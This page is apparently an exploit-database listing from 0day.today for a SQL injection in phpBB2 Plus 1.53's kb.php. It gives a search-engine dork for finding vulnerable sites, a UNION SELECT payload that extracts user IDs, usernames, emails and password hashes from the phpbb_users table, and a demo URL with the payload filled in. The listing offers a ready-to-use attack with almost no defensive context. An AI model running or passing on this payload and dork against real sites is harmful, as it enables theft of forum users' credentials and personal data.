[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpBB2 Plus 1.53 (kb.php?mode) SQL Injection Vulnerability

Author
Gamoscu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9668
Category
web applications
Date add
18-03-2010
Platform
unsorted
========================================================== 
phpBB2 Plus 1.53 (kb.php?mode) SQL Injection Vulnerability
========================================================== 

########################### 

Author : Gamoscu 

Homepage : http://www.1923turk.com 

Blog      : http://gamoscu.wordpress.com/

Dork : inurl:kb.php?mode=cat&cat= 
########################### 

[ Vulnerable File ] 

kb.php?mode=cat&cat= [ SQL ] 


[ XpL ] 

-1+union+select+1,concat(user_id,char(58),username, char(58),user_email,char(58),user_icq,char(58),use r_password),3,4,5,6+from+phpbb_users+limit+1,2-- 


[ Demo] 

http://www.xxxxx/xxxxxx/kb.php?mode=cat&cat=-1+union+select+1,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,2--





#  0day.today [2024-12-24]  #